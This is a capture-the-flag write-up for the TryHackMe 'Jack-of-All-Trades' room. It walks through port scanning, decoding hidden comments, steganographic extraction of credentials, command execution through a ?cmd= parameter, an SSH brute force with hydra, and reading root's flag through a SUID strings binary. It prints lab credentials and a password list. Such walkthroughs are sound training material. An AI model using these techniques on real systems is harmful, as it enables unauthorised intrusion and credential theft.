# Writeup [Jack-of-All-Trades](https://tryhackme.com/room/jackofalltrades) >After getting connetion let's try to search for the open ports. #### Nmap >***==nmap -sV -p- -vv <ip>==*** ``` 22/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Jack-of-all-trades! |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) 80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA) | 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA) | 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA) |_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519) ``` >It seems intresting that `http` is working on the port `22` and `ssh` is working on port `80` >Now when we try to connect to browser on port 22 it gives us some warning or says it's restricted  for that we have an [documentaion](https://support.mozilla.org/en-US/questions/1083282) on internet to bypass it. >Here in `about:config` serach for `network.security.ports.banned.override` in search tab and there choose `new -> String` and add port `22` in its value  >now go back to the webpage and click reload. It is now working properly. >We see the webpage but we don't get any usefull information then let's check `page source`  >There we have some comment telling us about `/recovery.php` and some encoded comment. let's check both of them >first the encoded message  Here we got some name as `Johny Graves well with his crypto jobhunting!` and `Password` >Being curious let's serach for `Johny graves crypto jobhunting` .So ther we found some thing  >Now let's go to `/recovery.php` page  It seems to be an login page where user reset it's password. Now let's chaeck its `page source`  >Again we have a long encoded message Try to decode it using `cyberchef` by method used by the `Johny graves`  >Decode fro `base32`  >Decode from `hex`  >Now at last decode from `Rot13` >we get ``` Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S ``` o going to the link that is provided in the message we fing `Stegosauria` site which obviously suggest stegnography  >Let's check the image provide on home page of site jack-of-all-trades >there we have 3 photos let's use `steghide` using the password that we found to check what's inside them. Download and ceck one by one all three image we don't find anything in last 2 photos but we got something in header image ***==steghide extract -sf header.jpg==***  ``` Here you go Jack. Good thing you thought ahead! Username: jackinthebox Password: TplFxiSHjY ``` Yeah we now get logged in in /recovery.php  >It is asking for us to send command. >Try adding ?cmd=id to the end of the URL:  we find jacks_password_list in it now by running `?cmd=cat /home/jack_password_list`we got ``` *hclqAzj+2GC+=0K eN<A@n^zI?FE$I5, X<(@zo2XrEN)#MGC ,,aE1K,nW3Os,afb ITMJpGGIqg1jn?>@ 0HguX{,fgXPE;8yF sjRUb4*@pz<*ZITu [8V7o^gl(Gjt5[WB yTq0jI$d}Ka<T}PD Sc.[[2pL<>e)vC4} 9;}#q*,A4wd{<X.T M41nrFt#PcV=(3%p GZx.t)H$&awU;SO< .MVettz]a;&Z;cAC 2fh%i9Pr5YiYIf51 TDF@mdEd3ZQ(]hBO v]XBmwAk8vk5t3EF 9iYZeZGQGG9&W4d1 8TIFce;KjrBWTAY^ SeUAwt7EB#fY&+yt n.FZvJ.x9sYe5s5d 8lN{)g32PG,1?[pM z@e1PmlmQ%k5sDz@ ow5APF>6r,y4krSo ``` Let's crack password by using hydra on user `jack` at `ssh` port `80` ***==hydra -l jack -P <password.txt> -s 80 ssh://<ip>==***  > Now let's login via ssh ***==ssh -p 80 jack@<ip>==***  There we got user.jpg  here we got firs flag!! #### Now Becoming root let's fid `SUID` bit ***==find / -perm /4000 2>/dev/null==***  There we got `/usr/bin/strings` with suid bit set and can be used for knowing data in /root/root.txt ***==/usr/bin/strings /root/root.txt==***  >So there we got final root flag!!!:))